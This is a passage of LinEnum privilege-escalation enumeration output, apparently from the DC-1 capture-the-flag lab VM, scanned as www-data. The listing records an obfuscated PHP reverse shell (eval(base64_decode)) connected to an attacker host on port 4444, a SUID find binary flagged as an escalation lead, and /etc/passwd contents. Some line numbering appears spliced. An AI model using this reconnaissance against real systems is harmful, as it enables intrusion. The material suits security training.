lrwxrwxrwx 1 root root 21 Apr 29  2013 udev-kernel.socket -> ../udev-kernel.socket

/lib/systemd/system/basic.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr 29  2013 udev-trigger.service -> ../udev-trigger.service
lrwxrwxrwx 1 root root 15 Apr 29  2013 udev.service -> ../udev.service


### SOFTWARE #############################################
[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl


[-] Installed compilers:
ii  checkpolicy                        2.1.8-2                          i386         SELinux policy compiler
ii  gcc                                4:4.7.2-1                        i386         GNU C compiler
ii  gcc-4.7                            4.7.2-5                          i386         GNU C compiler
ii  gcc-4.7-multilib                   4.7.2-5                          i386         GNU C compiler (multilib files)
ii  gcc-multilib                       4:4.7.2-1                        i386         GNU C compiler (multilib files)


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
-rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
-rw-r--r-- 1 root root 851 Jul 30  2011 /etc/profile
-rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10  2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20  2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22  2013 /sbin/mount.nfs


[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find


[-] SGID files:
-rwxr-sr-x 1 root ssh 128396 Jan 27  2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
-rwxr-sr-x 1 root mlocate 30492 Sep 25  2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 17908 Nov 18  2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49364 Feb 27  2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9708 Jun 11  2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9768 Nov 30  2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18020 Dec 10  2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34760 Jul  4  2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18168 Feb 27  2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 13960 Dec 12  2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
 624 -rwxr-sr-x 1 root shadow 30332 May  5  2012 /sbin/unix_chkpwd
 625 
 626 
 627 [-] Can't search *.conf files as no keyword was entered
 628 
 629 [-] Can't search *.php files as no keyword was entered
 630 
 631 [-] Can't search *.log files as no keyword was entered
 632 
 633 [-] Can't search *.ini files as no keyword was entered
 634 
 635 [-] All *.conf files in /etc (recursive 1 level):
 636 -rw-r--r-- 1 root root 45 May  7 01:08 /etc/resolv.conf
 637 -rw-r--r-- 1 root root 346 Mar 31  2012 /etc/discover-modprobe.conf
 638 -rw-r--r-- 1 root root 216 Sep 26  2016 /etc/sestatus.conf
 639 -rw-r--r-- 1 root root 1260 May 30  2008 /etc/ucf.conf
 640 -rw-r--r-- 1 root root 834 Jun  8  2012 /etc/gssapi_mech.conf
 641 -rw-r--r-- 1 root root 859 Nov 24  2012 /etc/insserv.conf
 642 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
 643 -rw-r--r-- 1 root root 3173 Dec 16  2017 /etc/reportbug.conf
 644 -rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
 645 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
 646 -rw-r--r-- 1 root root 284 Sep 25  2010 /etc/updatedb.conf
 647 -rw-r--r-- 1 root root 191 Feb  1  2012 /etc/libaudit.conf
 648 -rw-r--r-- 1 root root 604 May 16  2012 /etc/deluser.conf
 649 -rw-r--r-- 1 root root 2940 Feb 12  2016 /etc/gai.conf
 650 -rw-r--r-- 1 root root 2632 Oct  8  2014 /etc/rsyslog.conf
 651 -rw-r--r-- 1 root root 2082 May 20  2012 /etc/sysctl.conf
 652 -rw-r--r-- 1 root root 214 May 11  2013 /etc/idmapd.conf
 653 -rw-r--r-- 1 root root 956 Feb 22  2015 /etc/mke2fs.conf
 654 -rw-r--r-- 1 root root 552 Apr 30  2012 /etc/pam.conf
 655 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
 656 -rw-r--r-- 1 root root 2969 Dec 26  2012 /etc/debconf.conf
 657 -rw-r--r-- 1 root root 9 Aug  8  2006 /etc/host.conf
 658 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
 659 -rw-r--r-- 1 root root 475 Aug 29  2006 /etc/nsswitch.conf
 660 
 661 
 662 [-] Location and contents (if accessible) of .bash_history file(s):
 663 /home/flag4/.bash_history
 664 cd 
 665 ls
 666 vi flag4.txt
 667 ls
 668 exit
 669 
 670 
 671 [-] Any interesting mail in /var/mail:
 672 total 8
 673 drwxrwsr-x  2 root mail 4096 Feb 19 22:24 .
 674 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..
 675 
 676 
 677 ### SCAN COMPLETE ####################################
 678 
 679 #########################################################
 680 # Local Linux Enumeration & Privilege Escalation Script #
 681 #########################################################
 682 # www.rebootuser.com
 683 # version 0.95
 684 
 685 [-] Debug Info
 686 [+] Thorough tests = Disabled
 687 
 688 
 689 Scan started at:
 690 Tue May  7 01:08:52 AEST 2019
 691 
 692 
 693 ### SYSTEM ##############################################
 694 [-] Kernel information:
 695 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
 696 
 697 
 698 [-] Kernel information (continued):
 699 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
 700 
 701 
 702 [-] Specific release information:
 703 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
 704 NAME="Debian GNU/Linux"
 705 VERSION_ID="7"
 706 VERSION="7 (wheezy)"
 707 ID=debian
 708 ANSI_COLOR="1;31"
 709 HOME_URL="http://www.debian.org/"
 710 SUPPORT_URL="http://www.debian.org/support/"
 711 BUG_REPORT_URL="http://bugs.debian.org/"
 712 
 713 
 714 [-] Hostname:
 715 DC-1
 716 
 717 
 718 ### USER/GROUP ##########################################
 719 [-] Current user/group info:
 720 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 721 
 722 
 723 [-] Users that have previously logged onto the system:
 724 Username         Port     From             Latest
 725 root             tty1                      Thu Feb 28 12:10:51 +1000 2019
 726 
 727 
 728 [-] Who else is logged on:
 729  01:08:52 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
 730 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 731 
 732 
 733 [-] Group memberships:
 734 uid=0(root) gid=0(root) groups=0(root)
 735 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 736 uid=2(bin) gid=2(bin) groups=2(bin)
 737 uid=3(sys) gid=3(sys) groups=3(sys)
 738 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
 739 uid=5(games) gid=60(games) groups=60(games)
 740 uid=6(man) gid=12(man) groups=12(man)
 741 uid=7(lp) gid=7(lp) groups=7(lp)
 742 uid=8(mail) gid=8(mail) groups=8(mail)
 743 uid=9(news) gid=9(news) groups=9(news)
 744 uid=10(uucp) gid=10(uucp) groups=10(uucp)
 745 uid=13(proxy) gid=13(proxy) groups=13(proxy)
 746 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 747 uid=34(backup) gid=34(backup) groups=34(backup)
 748 uid=38(list) gid=38(list) groups=38(list)
 749 uid=39(irc) gid=39(irc) groups=39(irc)
 750 uid=41(gnats) gid=41(gnats) groups=41(gnats)
 751 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
 752 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
 753 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
 754 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
 755 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
 756 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
 757 uid=105(mysql) gid=109(mysql) groups=109(mysql)
 758 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
 759 
 760 
 761 [-] Contents of /etc/passwd:
 762 root:x:0:0:root:/root:/bin/bash
 763 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 764 bin:x:2:2:bin:/bin:/bin/sh
 765 sys:x:3:3:sys:/dev:/bin/sh
 766 sync:x:4:65534:sync:/bin:/bin/sync
 767 games:x:5:60:games:/usr/games:/bin/sh
 768 man:x:6:12:man:/var/cache/man:/bin/sh
 769 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 770 mail:x:8:8:mail:/var/mail:/bin/sh
 771 news:x:9:9:news:/var/spool/news:/bin/sh
 772 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 773 proxy:x:13:13:proxy:/bin:/bin/sh
 774 www-data:x:33:33:www-data:/var/www:/bin/sh
 775 backup:x:34:34:backup:/var/backups:/bin/sh
 776 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 777 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 778 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 779 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 780 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 781 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 782 statd:x:102:65534::/var/lib/nfs:/bin/false
 783 messagebus:x:103:107::/var/run/dbus:/bin/false
 784 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 785 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 786 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
 787 
 788 
 789 [-] Super user account(s):
 790 root
 791 
 792 
 793 [-] Are permissions on /home directories lax:
 794 total 12K
 795 drwxr-xr-x  3 root  root  4.0K Feb 19 23:51 .
 796 drwxr-xr-x 23 root  root  4.0K Feb 19 22:34 ..
 797 drwxr-xr-x  2 flag4 flag4 4.0K Feb 19 23:28 flag4
 798 
 799 
 800 [-] Root is allowed to login via SSH:
 801 PermitRootLogin yes
 802 
 803 
 804 ### ENVIRONMENTAL #######################################
 805 [-] Environment information:
 806 APACHE_PID_FILE=/var/run/apache2.pid
 807 APACHE_RUN_USER=www-data
 808 APACHE_LOG_DIR=/var/log/apache2
 809 PATH=/usr/local/bin:/usr/bin:/bin
 810 PWD=/var/www
 811 APACHE_RUN_GROUP=www-data
 812 LANG=C
 813 SHLVL=1
 814 APACHE_LOCK_DIR=/var/lock/apache2
 815 APACHE_RUN_DIR=/var/run/apache2
 816 _=/usr/bin/env
 817 
 818 
 819 [-] Path information:
 820 /usr/local/bin:/usr/bin:/bin
 821 
 822 
 823 [-] Available shells:
 824 # /etc/shells: valid login shells
 825 /bin/sh
 826 /bin/dash
 827 /bin/bash
 828 /bin/rbash
 829 
 830 
 831 [-] Current umask value:
 832 0022
 833 u=rwx,g=rx,o=rx
 834 
 835 
 836 [-] umask value as specified in /etc/login.defs:
 837 UMASK        022
 838 
 839 
 840 [-] Password and storage information:
 841 PASS_MAX_DAYS    99999
 842 PASS_MIN_DAYS    0
 843 PASS_WARN_AGE    7
 844 ENCRYPT_METHOD SHA512
 845 
 846 
 847 ### JOBS/TASKS ##########################################
 848 [-] Cron jobs:
 849 -rw-r--r-- 1 root root  722 Jul  4  2012 /etc/crontab
 850 
 851 /etc/cron.d:
 852 total 16
 853 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 854 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 855 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 856 -rw-r--r--  1 root root  510 May 10  2018 php5
 857 
 858 /etc/cron.daily:
 859 total 68
 860 drwxr-xr-x  2 root root  4096 Feb 19 23:01 .
 861 drwxr-xr-x 85 root root  4096 May  7 01:08 ..
 862 -rw-r--r--  1 root root   102 Jul  4  2012 .placeholder
 863 -rwxr-xr-x  1 root root   633 May 30  2018 apache2
 864 -rwxr-xr-x  1 root root 14985 Oct 24  2014 apt
 865 -rwxr-xr-x  1 root root   314 Nov  5  2012 aptitude
 866 -rwxr-xr-x  1 root root   355 Jun 11  2012 bsdmainutils
 867 -rwxr-xr-x  1 root root   256 May  3  2016 dpkg
 868 -rwxr-xr-x  1 root root  4125 Feb 11  2018 exim4-base
 869 -rwxr-xr-x  1 root root    89 May 17  2012 logrotate
 870 -rwxr-xr-x  1 root root  1365 Jun 19  2012 man-db
 871 -rwxr-xr-x  1 root root   606 Sep 25  2010 mlocate
 872 -rwxr-xr-x  1 root root   249 May 26  2012 passwd
 873 
 874 /etc/cron.hourly:
 875 total 12
 876 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 877 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 878 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 879 
 880 /etc/cron.monthly:
 881 total 12
 882 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 883 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 884 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 885 
 886 /etc/cron.weekly:
 887 total 16
 888 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 889 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 890 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 891 -rwxr-xr-x  1 root root  907 Jun 19  2012 man-db
 892 
 893 
 894 [-] Crontab contents:
 895 # /etc/crontab: system-wide crontab
 896 # Unlike any other crontab you don't have to run the `crontab'
 897 # command to install the new version when you edit this file
 898 # and files in /etc/cron.d. These files also have username fields,
 899 # that none of the other crontabs do.
 900 
 901 SHELL=/bin/sh
 902 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 903 
 904 # m h dom mon dow user    command
 905 17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
 906 25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
 907 47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
 908 52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
 909 #
 910 
 911 
 912 ### NETWORKING  ##########################################
 913 [-] Network and IP info:
 914 eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:f4:98  
 915           inet addr:192.168.16.107  Bcast:192.168.16.255  Mask:255.255.255.0
 916           inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
 917           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 918           RX packets:8711 errors:0 dropped:0 overruns:0 frame:0
 919           TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0
 920           collisions:0 txqueuelen:1000 
 921           RX bytes:1327204 (1.2 MiB)  TX bytes:1104845 (1.0 MiB)
 922 
 923 lo        Link encap:Local Loopback  
 924           inet addr:127.0.0.1  Mask:255.0.0.0
 925           inet6 addr: ::1/128 Scope:Host
 926           UP LOOPBACK RUNNING  MTU:16436  Metric:1
 927           RX packets:50 errors:0 dropped:0 overruns:0 frame:0
 928           TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
 929           collisions:0 txqueuelen:0 
 930           RX bytes:4852 (4.7 KiB)  TX bytes:4852 (4.7 KiB)
 931 
 932 
 933 [-] ARP history:
 934 192.168.16.112 dev eth0  INCOMPLETE
 935 
 936 
 937 [-] Nameserver(s):
 938 nameserver 192.168.16.254
 939 nameserver 0.0.0.0
 940 
 941 
 942 [-] Default route:
 943 default via 192.168.16.254 dev eth0 
 944 
 945 
 946 [-] Listening TCP:
 947 Active Internet connections (servers and established)
 948 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 949 tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
 950 tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
 951 tcp        0      0 0.0.0.0:40858           0.0.0.0:*               LISTEN      -               
 952 tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
 953 tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
 954 tcp        0    480 192.168.16.107:33469    192.168.16.112:4444     ESTABLISHED 3406/php        
 955 tcp6       0      0 :::22                   :::*                    LISTEN      -               
 956 tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
 957 tcp6       0      0 :::34190                :::*                    LISTEN      -               
 958 tcp6       0      0 :::111                  :::*                    LISTEN      -               
 959 tcp6       0      0 :::80                   :::*                    LISTEN      -               
 960 tcp6       0      0 192.168.16.107:80       192.168.16.112:52090    TIME_WAIT   -               
 961 tcp6       1      0 192.168.16.107:80       192.168.16.112:63539    CLOSE_WAIT  -               
 962 
 963 
 964 [-] Listening UDP:
 965 Active Internet connections (servers and established)
 966 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 967 udp        0      0 0.0.0.0:59942           0.0.0.0:*                           -               
 968 udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
 969 udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
 970 udp        0      0 0.0.0.0:769             0.0.0.0:*                           -               
 971 udp        0      0 127.0.0.1:801           0.0.0.0:*                           -               
 972 udp        0      0 0.0.0.0:21881           0.0.0.0:*                           -               
 973 udp6       0      0 :::52815                :::*                                -               
 974 udp6       0      0 :::28256                :::*                                -               
 975 udp6       0      0 :::111                  :::*                                -               
 976 udp6       0      0 :::769                  :::*                                -               
 977 
 978 
 979 ### SERVICES #############################################
 980 [-] Running processes:
 981 USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
 982 root         1  0.0  0.0   2296   780 ?        Ss   00:08   0:01 init [2]  
 983 root         2  0.0  0.0      0     0 ?        S    00:08   0:00 [kthreadd]
 984 root         3  0.0  0.0      0     0 ?        S    00:08   0:00 [ksoftirqd/0]
 985 root         4  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/0:0]
 986 root         6  0.0  0.0      0     0 ?        S    00:08   0:00 [watchdog/0]
 987 root         7  0.0  0.0      0     0 ?        S<   00:08   0:00 [cpuset]
 988 root         8  0.0  0.0      0     0 ?        S<   00:08   0:00 [khelper]
 989 root         9  0.0  0.0      0     0 ?        S    00:08   0:00 [kdevtmpfs]
 990 root        10  0.0  0.0      0     0 ?        S<   00:08   0:00 [netns]
 991 root        11  0.0  0.0      0     0 ?        S    00:08   0:00 [sync_supers]
 992 root        12  0.0  0.0      0     0 ?        S    00:08   0:00 [bdi-default]
 993 root        13  0.0  0.0      0     0 ?        S<   00:08   0:00 [kintegrityd]
 994 root        14  0.0  0.0      0     0 ?        S<   00:08   0:00 [kblockd]
 995 root        15  0.0  0.0      0     0 ?        S    00:08   0:00 [khungtaskd]
 996 root        16  0.0  0.0      0     0 ?        S    00:08   0:00 [kswapd0]
 997 root        17  0.0  0.0      0     0 ?        SN   00:08   0:00 [ksmd]
 998 root        18  0.0  0.0      0     0 ?        S    00:08   0:00 [fsnotify_mark]
 999 root        19  0.0  0.0      0     0 ?        S<   00:08   0:00 [crypto]
1000 root        95  0.0  0.0      0     0 ?        S    00:08   0:00 [khubd]
1001 root       105  0.0  0.0      0     0 ?        S<   00:08   0:00 [ata_sff]
1002 root       115  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_0]
1003 root       125  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_1]
1004 root       134  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_2]
1005 root       135  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_3]
1006 root       136  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_4]
1007 root       137  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_5]
1008 root       138  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_6]
1009 root       139  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_7]
1010 root       140  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_8]
1011 root       141  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_9]
1012 root       142  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_10]
1013 root       143  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_11]
1014 root       144  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_12]
1015 root       145  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_13]
1016 root       146  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_14]
1017 root       147  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_15]
1018 root       148  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_16]
1019 root       149  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_17]
1020 root       150  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_18]
1021 root       151  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_19]
1022 root       152  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_20]
1023 root       153  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_21]
1024 root       154  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_22]
1025 root       155  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_23]
1026 root       156  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_24]
1027 root       157  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_25]
1028 root       158  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_26]
1029 root       159  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_27]
1030 root       160  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_28]
1031 root       161  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_29]
1032 root       162  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_30]
1033 root       163  0.0  0.0      0     0 ?        S    00:08   0:00 [scsi_eh_31]
1034 root       190  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:29]
1035 root       191  0.0  0.0      0     0 ?        S    00:08   0:00 [kworker/u:30]
1036 root       308  0.0  0.0      0     0 ?        S    00:08   0:00 [jbd2/sda1-8]
1037 root       309  0.0  0.0      0     0 ?        S<   00:08   0:00 [ext4-dio-unwrit]
1038 root       458  0.0  0.1   2688  1244 ?        Ss   00:08   0:00 udevd --daemon
1039 root       543  0.0  0.0      0     0 ?        S<   00:08   0:00 [ttm_swap]
1040 root       699  0.0  0.0      0     0 ?        S<   00:08   0:00 [kpsmoused]
1041 root      1866  0.0  0.0   2388   904 ?        Ss   00:08   0:00 /sbin/rpcbind -w
1042 statd     1897  0.0  0.1   2660  1280 ?        Ss   00:08   0:00 /sbin/rpc.statd
1043 root      1902  0.0  0.0   2684   888 ?        S    00:08   0:00 udevd --daemon
1044 root      1903  0.0  0.0      0     0 ?        S<   00:08   0:00 [rpciod]
1045 root      1905  0.0  0.0      0     0 ?        S<   00:08   0:00 [nfsiod]
1046 root      1912  0.0  0.0   2592   568 ?        Ss   00:08   0:00 /usr/sbin/rpc.idmapd
1047 root      2215  0.0  0.2  28352  2080 ?        Sl   00:08   0:00 /usr/sbin/rsyslogd -c5
1048 root      2267  0.0  0.0   1892   608 ?        Ss   00:08   0:00 /usr/sbin/acpid
1049 root      2303  0.0  0.8  43680  8928 ?        Ss   00:08   0:00 /usr/sbin/apache2 -k start
1050 daemon    2347  0.0  0.0   2168   316 ?        Ss   00:08   0:00 /usr/sbin/atd
1051 103       2353  0.0  0.0   3032   644 ?        Ss   00:08   0:00 /usr/bin/dbus-daemon --system
1052 www-data  2381  0.0  1.3  48448 14420 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1053 www-data  2382  0.0  1.2  47424 13408 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1054 www-data  2383  0.0  1.4  47676 14836 ?        S    00:08   0:01 /usr/sbin/apache2 -k start
1055 www-data  2384  0.0  1.1  46148 12080 ?        S    00:08   0:00 /usr/sbin/apache2 -k start
1056 root      2438  0.0  0.0   3852   988 ?        Ss   00:08   0:00 /usr/sbin/cron
1057 root      2493  0.0  0.0   1948   588 ?        S    00:08   0:00 /bin/sh /usr/bin/mysqld_safe
1058 mysql     2831  0.0  4.7 329380 49184 ?        Sl   00:08   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
1059 root      2832  0.0  0.0   1868   604 ?        S    00:08   0:00 logger -t mysqld -p daemon.error
1060 101       3228  0.0  0.0   7424   992 ?        Ss   00:08   0:00 /usr/sbin/exim4 -bd -q30m
1061 root      3281  0.0  0.0   3796   840 tty2     Ss+  00:08   0:00 /sbin/getty 38400 tty2
1062 root      3282  0.0  0.0   3796   836 tty3     Ss+  00:08   0:00 /sbin/getty 38400 tty3
1063 root      3283  0.0  0.0   3796   840 tty4     Ss+  00:08   0:00 /sbin/getty 38400 tty4
1064 root      3284  0.0  0.0   3796   836 tty5     Ss+  00:08   0:00 /sbin/getty 38400 tty5
1065 root      3285  0.0  0.0   3796   840 tty6     Ss+  00:08   0:00 /sbin/getty 38400 tty6
1066 root      3287  0.0  0.0      0     0 ?        S    00:08   0:00 [flush-8:0]
1067 root      3298  0.0  0.2   5196  2356 ?        Ss   00:08   0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
1068 root      3339  0.0  0.1   6496  1076 ?        Ss   00:08   0:00 /usr/sbin/sshd
1069 root      3354  0.0  0.0   3796   840 tty1     Ss+  00:09   0:00 /sbin/getty 38400 tty1
1070 www-data  3358  0.0  1.5  49688 15620 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1071 www-data  3360  0.0  1.1  45892 11832 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1072 www-data  3361  0.0  1.6  51624 16812 ?        S    00:18   0:00 /usr/sbin/apache2 -k start
1073 www-data  3381  0.0  1.1  45892 11828 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
1074 www-data  3385  0.0  1.2  47436 13392 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
1075 www-data  3386  0.0  1.2  47416 13320 ?        S    00:32   0:00 /usr/sbin/apache2 -k start
 1076 www-data  3405  0.0  0.0   1948   540 ?        S    00:39   0:00 sh -c php -r 'eval(base64_decode(...));'
 1077 www-data  3406  0.0  0.8  41132  9032 ?        S    00:39   0:01 php -r eval(base64_decode(...));
1078 www-data  3408  0.0  0.0   1948   520 ?        S    00:40   0:00 sh -c /bin/sh 
1079 www-data  3409  0.0  0.0   1948   576 ?        S    00:40   0:00 /bin/sh
1080 root      3488  0.0  0.0      0     0 ?        S    01:01   0:00 [kworker/0:1]
1081 root      4393  0.0  0.0      0     0 ?        S    01:07   0:00 [kworker/0:2]
1082 www-data  4398  0.0  0.2   3824  2088 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1083 www-data  4857  0.0  0.1   3876  1696 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1084 www-data  4858  0.0  0.0   1876   448 ?        S    01:08   0:00 tee -a
1085 www-data  5028  0.0  0.1   3860  1416 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
1086 www-data  5029  0.0  0.0   2832   996 ?        R    01:08   0:00 ps aux
1087 
1088 
1089 [-] Process binaries and associated permissions (from above list):
1090 -rwxr-xr-x 1 root root   941252 Oct 27  2016 /bin/bash
1091 lrwxrwxrwx 1 root root        4 Mar  1  2012 /bin/sh -> dash
1092 -rwxr-xr-x 2 root root    26684 Dec 10  2012 /sbin/getty
